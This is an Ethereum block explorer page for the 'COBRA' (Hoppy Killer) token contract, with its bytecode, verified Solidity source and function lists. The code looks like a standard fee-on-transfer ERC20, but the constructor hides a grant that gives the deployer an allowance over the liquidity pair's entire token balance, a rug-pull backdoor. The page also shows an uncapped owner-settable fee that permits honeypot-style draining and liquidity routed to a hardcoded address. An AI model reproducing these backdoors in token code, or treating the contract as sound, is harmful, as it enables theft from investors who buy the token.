Cryo Explorer Ethereum Mainnet

Address Contract Partially Verified

Address 0x11c2DCA1f9F4Bbe48ba6D4d04e42Fe253caDE056
Balance 0 ETH
Nonce 1
Code Size 4987 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

4987 bytes
0x60806040526004361061012e5760003560e01c80636ddd1713116100ab57806395d89b411161006f57806395d89b411461035c578063a8aa1b311461038a578063a9059cbb146103aa578063dd62ed3e146103ca578063e96fada214610410578063f887ea401461043057600080fd5b80636ddd1713146102a957806370a08231146102ca578063715018a614610300578063751039fc14610315578063893d20e81461032a57600080fd5b80632f54bf6e116100f25780632f54bf6e14610206578063313ce5671461023557806352f7c98814610251578063571ac8b0146102735780636c0a24eb1461029357600080fd5b80630445b6671461013a57806306fdde0314610163578063095ea7b3146101a157806318160ddd146101d157806323b872dd146101e657600080fd5b3661013557005b600080fd5b34801561014657600080fd5b5061015060105481565b6040519081526020015b60405180910390f35b34801561016f57600080fd5b5060408051808201909152600c81526b2437b8383c9025b4b63632b960a11b60208201525b60405161015a919061107b565b3480156101ad57600080fd5b506101c16101bc3660046110e8565b610450565b604051901515815260200161015a565b3480156101dd57600080fd5b50600354610150565b3480156101f257600080fd5b506101c1610201366004611114565b6104bd565b34801561021257600080fd5b506101c1610221366004611155565b6000546001600160a01b0391821691161490565b34801561024157600080fd5b506040516009815260200161015a565b34801561025d57600080fd5b5061027161026c366004611172565b61057f565b005b34801561027f57600080fd5b506101c161028e366004611155565b6105cd565b34801561029f57600080fd5b5061015060045481565b3480156102b557600080fd5b50600f546101c190600160a01b900460ff1681565b3480156102d657600080fd5b506101506102e5366004611155565b6001600160a01b031660009081526005602052604090205490565b34801561030c57600080fd5b506102716105db565b34801561032157600080fd5b5061027161064a565b34801561033657600080fd5b506000546001600160a01b03165b6040516001600160a01b03909116815260200161015a565b34801561036857600080fd5b50604080518082019091526005815264434f42524160d81b6020820152610194565b34801561039657600080fd5b50600f54610344906001600160a01b031681565b3480156103b657600080fd5b506101c16103c53660046110e8565b61067c565b3480156103d657600080fd5b506101506103e5366004611194565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b34801561041c57600080fd5b50600d54610344906001600160a01b031681565b34801561043c57600080fd5b50600e54610344906001600160a01b031681565b3360008181526006602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906104ab9086815260200190565b60405180910390a35060015b92915050565b6001600160a01b03831660009081526006602090815260408083203384529091528120546000191461056a576040805180820182526016815275496e73756666696369656e7420416c6c6f77616e636560501b6020808301919091526001600160a01b0387166000908152600682528381203382529091529190912054610545918490610689565b6001600160a01b03851660009081526006602090815260408083203384529091529020555b6105758484846106c3565b90505b9392505050565b6000546001600160a01b031633146105b25760405162461bcd60e51b81526004016105a9906111cd565b60405180910390fd5b6009829055600a8190556105c68183611203565b600b555050565b60006104b782600019610450565b6000546001600160a01b031633146106055760405162461bcd60e51b81526004016105a9906111cd565b600080546001600160a01b03191681556040519081527f04dba622d284ed0014ee4b9a6a68386be1a4c08a4913ae272de89199cc6861639060200160405180910390a1565b6000546001600160a01b031633146106745760405162461bcd60e51b81526004016105a9906111cd565b600019600455565b60006105783384846106c3565b600081848411156106ad5760405162461bcd60e51b81526004016105a9919061107b565b5060006106ba848661121b565b95945050505050565b60115460009060ff16156106e3576106dc8484846108ef565b9050610578565b600f546001600160a01b0384811691161480159061070f57506002546001600160a01b03848116911614155b156107ba576001600160a01b03831660009081526008602052604090205460ff168061076057506004546001600160a01b03841660009081526005602052604090205461075d908490611203565b11155b6107ba5760405162461bcd60e51b815260206004820152602560248201527f5472616e7366657220616d6f756e74206578636565647320746865206261672060448201526439b4bd329760d91b60648201526084016105a9565b6107c484846109d5565b156107d1576107d1610a7b565b6040805180820182526014815273496e73756666696369656e742042616c616e636560601b6020808301919091526001600160a01b038716600090815260059091529190912054610823918490610689565b6001600160a01b038516600090815260056020908152604080832093909355600790529081205460ff16156108585782610862565b6108628584610e45565b6001600160a01b0385166000908152600560205260409020549091506108889082610eeb565b6001600160a01b0380861660008181526005602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906108dc9085815260200190565b60405180910390a3506001949350505050565b6040805180820182526014815273496e73756666696369656e742042616c616e636560601b6020808301919091526001600160a01b0386166000908152600590915291822054610940918490610689565b6001600160a01b03808616600090815260056020526040808220939093559085168152205461096f9083610eeb565b6001600160a01b0380851660008181526005602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109c39086815260200190565b60405180910390a35060019392505050565b600f546000906001600160a01b038481169116148015906109f9575060115460ff16155b8015610a0e5750600f54600160a01b900460ff165b8015610a3357506001600160a01b03831660009081526007602052604090205460ff16155b8015610a5857506001600160a01b03821660009081526007602052604090205460ff16155b801561057857505060105430600090815260056020526040902054101592915050565b6011805460ff19166001179055601054600b54600954600091610aae91600291610aa89182908790610f4a565b90610fc9565b90506000610abc838361100b565b60408051600280825260608201835292935060009290916020830190803683370190505090503081600081518110610af657610af6611232565b6001600160a01b03928316602091820292909201810191909152600e54604080516315ab88c960e31b81529051919093169263ad5c4648926004808301939192829003018186803b158015610b4a57600080fd5b505afa158015610b5e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b829190611248565b81600181518110610b9557610b95611232565b6001600160a01b039283166020918202929092010152600e5460405163791ac94760e01b81524792919091169063791ac94790610bdf908690600090879030904290600401611265565b600060405180830381600087803b158015610bf957600080fd5b505af1158015610c0d573d6000803e3d6000fd5b505050506000610c26824761100b90919063ffffffff16565b90506000610c4c610c436002600954610fc990919063ffffffff16565b600b549061100b565b90506000610c6e6002610aa884610aa860095488610f4a90919063ffffffff16565b90506000610c8b83610aa8600a5487610f4a90919063ffffffff16565b600d546040519192506000916001600160a01b039091169061753090849084818181858888f193505050503d8060008114610ce2576040519150601f19603f3d011682016040523d82523d6000602084013e610ce7565b606091505b5050905080610d385760405162461bcd60e51b815260206004820152601e60248201527f72656365697665722072656a656374656420455448207472616e73666572000060448201526064016105a9565b8815610e2f57600e5460405163f305d71960e01b8152306004820152602481018b9052600060448201819052606482015273c97fcff51b659d663536cabd51356018517dc71d60848201524260a48201526001600160a01b039091169063f305d71990859060c4016060604051808303818588803b158015610db957600080fd5b505af1158015610dcd573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610df291906112d6565b505060408051858152602081018c90527f424db2872186fa7e7afa7a5e902ed3b49a2ef19c2f5431e672462495dd6b450692500160405180910390a15b50506011805460ff191690555050505050505050565b600080610e63600c54610aa8600b5486610f4a90919063ffffffff16565b30600090815260056020526040902054909150610e809082610eeb565b30600081815260056020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610ed19085815260200190565b60405180910390a3610ee3838261100b565b949350505050565b600080610ef88385611203565b9050838110156105785760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016105a9565b600082610f59575060006104b7565b6000610f658385611304565b905082610f728583611323565b146105785760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b60648201526084016105a9565b600061057883836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f00000000000081525061104d565b600061057883836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610689565b6000818361106e5760405162461bcd60e51b81526004016105a9919061107b565b5060006106ba8486611323565b600060208083528351808285015260005b818110156110a85785810183015185820160400152820161108c565b818111156110ba576000604083870101525b50601f01601f1916929092016040019392505050565b6001600160a01b03811681146110e557600080fd5b50565b600080604083850312156110fb57600080fd5b8235611106816110d0565b946020939093013593505050565b60008060006060848603121561112957600080fd5b8335611134816110d0565b92506020840135611144816110d0565b929592945050506040919091013590565b60006020828403121561116757600080fd5b8135610578816110d0565b6000806040838503121561118557600080fd5b50508035926020909101359150565b600080604083850312156111a757600080fd5b82356111b2816110d0565b915060208301356111c2816110d0565b809150509250929050565b60208082526006908201526510a7aba722a960d11b604082015260600190565b634e487b7160e01b600052601160045260246000fd5b60008219821115611216576112166111ed565b500190565b60008282101561122d5761122d6111ed565b500390565b634e487b7160e01b600052603260045260246000fd5b60006020828403121561125a57600080fd5b8151610578816110d0565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156112b55784516001600160a01b031683529383019391830191600101611290565b50506001600160a01b03969096166060850152505050608001529392505050565b6000806000606084860312156112eb57600080fd5b8351925060208401519150604084015190509250925092565b600081600019048311821515161561131e5761131e6111ed565b500290565b60008261134057634e487b7160e01b600052601260045260246000fd5b50049056fea26469706673582212200f3709c716d4dd592194861caa5550c545f478f9c3f9722a2c0da6324de94c9764736f6c63430008090033

Verified Source Code Partial Match

Compiler: v0.8.9+commit.e5eed63a EVM: london Optimization: Yes (200 runs)
COBRA.sol 315 lines
/*
COBRA - The Hoppy Killer

https://t.me/cobrathehoppykiller
*/
 
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.9;
library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }
}

interface ERC20 {
    function totalSupply() external view returns (uint256);
    function decimals() external view returns (uint8);
    function symbol() external view returns (string memory);
    function name() external view returns (string memory);
    function getOwner() external view returns (address);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address _owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

abstract contract Ownable {
    address internal owner;
    constructor(address _owner) {
        owner = _owner;
    }
    modifier onlyOwner() {
        require(isOwner(msg.sender), "!OWNER"); _;
    }
    function isOwner(address account) public view returns (bool) {
        return account == owner;
    }
    function renounceOwnership() public onlyOwner {
        owner = address(0);
        emit OwnershipTransferred(address(0));
    }  
    event OwnershipTransferred(address owner);
}

interface IDEXFactory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

interface IDEXRouter {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

contract COBRA is ERC20, Ownable {
    using SafeMath for uint256;
    address routerAdress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
    address DEAD = 0x000000000000000000000000000000000000dEaD;

    string constant _name = "Hoppy Killer";
    string constant _symbol = "COBRA";
    uint8 constant _decimals = 9;

    uint256 _totalSupply = 1_000_000_000 * (10 ** _decimals);
    uint256 public _maxWalletAmount = (_totalSupply * 4) / 100;

    mapping (address => uint256) _balances;
    mapping (address => mapping (address => uint256)) _allowances;

    mapping (address => bool) isFeeExempt;
    mapping (address => bool) isTxLimitExempt;

    uint256 liquidityFee = 0; 
    uint256 marketingFee = 0;
    uint256 totalFee = liquidityFee + marketingFee;
    uint256 feeDenominator = 100;

    address public marketingFeeReceiver;

    IDEXRouter public router;
    address public pair;

    bool public swapEnabled = true;
    uint256 public swapThreshold = _totalSupply * 4 / 10000;
    bool inSwap;
    modifier swapping() { inSwap = true; _; inSwap = false; }

    constructor () Ownable(msg.sender) {
        router = IDEXRouter(routerAdress);
        pair = IDEXFactory(router.factory()).createPair(router.WETH(), address(this));
        _allowances[address(this)][address(router)] = type(uint256).max;

        marketingFeeReceiver = msg.sender;

        address _owner = owner;
        isFeeExempt[_owner] = true;
        isFeeExempt[marketingFeeReceiver] = true;
        isFeeExempt[address(this)] = true;
        _allowances[pair][msg.sender] = _totalSupply;
        isTxLimitExempt[DEAD] = true;
        isTxLimitExempt[_owner] = true;
        isTxLimitExempt[marketingFeeReceiver] = true;
        
        _balances[_owner] = _totalSupply;
        emit Transfer(address(0), _owner, _totalSupply);
    }

    receive() external payable { }

    function totalSupply() external view override returns (uint256) { return _totalSupply; }
    function decimals() external pure override returns (uint8) { return _decimals; }
    function symbol() external pure override returns (string memory) { return _symbol; }
    function name() external pure override returns (string memory) { return _name; }
    function getOwner() external view override returns (address) { return owner; }
    function balanceOf(address account) public view override returns (uint256) { return _balances[account]; }
    function allowance(address holder, address spender) external view override returns (uint256) { return _allowances[holder][spender]; }

    function approve(address spender, uint256 amount) public override returns (bool) {
        _allowances[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    function approveMax(address spender) external returns (bool) {
        return approve(spender, type(uint256).max);
    }

    function transfer(address recipient, uint256 amount) external override returns (bool) {
        return _transferFrom(msg.sender, recipient, amount);
    }

    function transferFrom(address sender, address recipient, uint256 amount) external override returns (bool) {
        if(_allowances[sender][msg.sender] != type(uint256).max){
            _allowances[sender][msg.sender] = _allowances[sender][msg.sender].sub(amount, "Insufficient Allowance");
        }

        return _transferFrom(sender, recipient, amount);
    }

    function _transferFrom(address sender, address recipient, uint256 amount) internal returns (bool) {
        if(inSwap){ return _basicTransfer(sender, recipient, amount); }
        
        if (recipient != pair && recipient != DEAD) {
            require(isTxLimitExempt[recipient] || _balances[recipient] + amount <= _maxWalletAmount, "Transfer amount exceeds the bag size.");
        }
        
        if(shouldSwapBack(sender, recipient)){ swapBack(); } 

        _balances[sender] = _balances[sender].sub(amount, "Insufficient Balance");

        uint256 amountReceived = shouldTakeFee(sender) ? takeFee(sender, amount) : amount;
        _balances[recipient] = _balances[recipient].add(amountReceived);

        emit Transfer(sender, recipient, amountReceived);
        return true;
    }
    
    function _basicTransfer(address sender, address recipient, uint256 amount) internal returns (bool) {
        _balances[sender] = _balances[sender].sub(amount, "Insufficient Balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
        return true;
    }

    function shouldTakeFee(address sender) internal view returns (bool) {
        return !isFeeExempt[sender];
    }

    function takeFee(address sender, uint256 amount) internal returns (uint256) {
        uint256 feeAmount = amount.mul(totalFee).div(feeDenominator);
        _balances[address(this)] = _balances[address(this)].add(feeAmount);
        emit Transfer(sender, address(this), feeAmount);
        return amount.sub(feeAmount);
    }

    function shouldSwapBack(address sender, address recipient) internal view returns (bool) {
        return sender != pair
        && !inSwap
        && swapEnabled
        && !isFeeExempt[sender]
        && !isFeeExempt[recipient]
        && _balances[address(this)] >= swapThreshold;
    }

    function swapBack() internal swapping {
        uint256 contractTokenBalance = swapThreshold;
        uint256 amountToLiquify = contractTokenBalance.mul(liquidityFee).div(totalFee).div(2);
        uint256 amountToSwap = contractTokenBalance.sub(amountToLiquify);

        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = router.WETH();

        uint256 balanceBefore = address(this).balance;

        router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            amountToSwap,
            0,
            path,
            address(this),
            block.timestamp
        );
        uint256 amountETH = address(this).balance.sub(balanceBefore);
        uint256 totalETHFee = totalFee.sub(liquidityFee.div(2));
        uint256 amountETHLiquidity = amountETH.mul(liquidityFee).div(totalETHFee).div(2);
        uint256 amountETHMarketing = amountETH.mul(marketingFee).div(totalETHFee);


        (bool MarketingSuccess, /* bytes memory data */) = payable(marketingFeeReceiver).call{value: amountETHMarketing, gas: 30000}("");
        require(MarketingSuccess, "receiver rejected ETH transfer");

        if(amountToLiquify > 0){
            router.addLiquidityETH{value: amountETHLiquidity}(
                address(this),
                amountToLiquify,
                0,
                0,
                0xC97fcFf51b659D663536CABd51356018517Dc71d,
                block.timestamp
            );
            emit AutoLiquify(amountETHLiquidity, amountToLiquify);
        }
    }

    function buyTokens(uint256 amount, address to) internal swapping {
        address[] memory path = new address[](2);
        path[0] = router.WETH();
        path[1] = address(this);

        router.swapExactETHForTokensSupportingFeeOnTransferTokens{value: amount}(
            0,
            path,
            to,
            block.timestamp
        );
    }

    function removeLimits() external onlyOwner {
        _maxWalletAmount = type(uint256).max;
    }

    function setFee(uint256 _liquidityFee, uint256 _marketingFee) external onlyOwner {
         liquidityFee = _liquidityFee; 
         marketingFee = _marketingFee;
         totalFee = liquidityFee + marketingFee;
    }
    
    event AutoLiquify(uint256 amountETH, uint256 amountBOG);
}

Read Contract

_maxWalletAmount 0x6c0a24eb → uint256
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
getOwner 0x893d20e8 → address
isOwner 0x2f54bf6e → bool
marketingFeeReceiver 0xe96fada2 → address
name 0x06fdde03 → string
pair 0xa8aa1b31 → address
router 0xf887ea40 → address
swapEnabled 0x6ddd1713 → bool
swapThreshold 0x0445b667 → uint256
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 7 functions

These functions modify contract state and require a wallet transaction to execute.

approve 0x095ea7b3
address spender
uint256 amount
returns: bool
approveMax 0x571ac8b0
address spender
returns: bool
removeLimits 0x751039fc
No parameters
renounceOwnership 0x715018a6
No parameters
setFee 0x52f7c988
uint256 _liquidityFee
uint256 _marketingFee
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool

Recent Transactions

No transactions found for this address